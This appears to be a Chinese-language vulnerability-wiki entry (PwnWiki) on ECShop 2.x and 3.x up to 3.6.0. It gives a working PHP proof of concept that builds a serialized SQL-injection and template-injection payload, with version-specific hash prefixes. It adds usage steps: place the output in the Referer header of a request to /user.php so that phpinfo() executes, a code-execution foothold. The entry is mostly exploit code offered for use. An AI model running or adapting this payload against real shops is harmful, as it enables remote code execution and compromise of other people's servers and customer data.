免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
影响版本
Ecshop 2.x Ecshop 3.x-3.6.0
POC
<?php
$shell = bin2hex("{\$asd';phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$test = sprintf("*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -", bin2hex($id), $shell);
$arr = array();
$arr"num"=$test;
$arr"id"=$id;
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>
漏洞利用
访问
http://127.0.0.1/user.php
添加referer请求头,将poc放入再请求,可以看到执行了phpinfo()
PWNWIK.COM
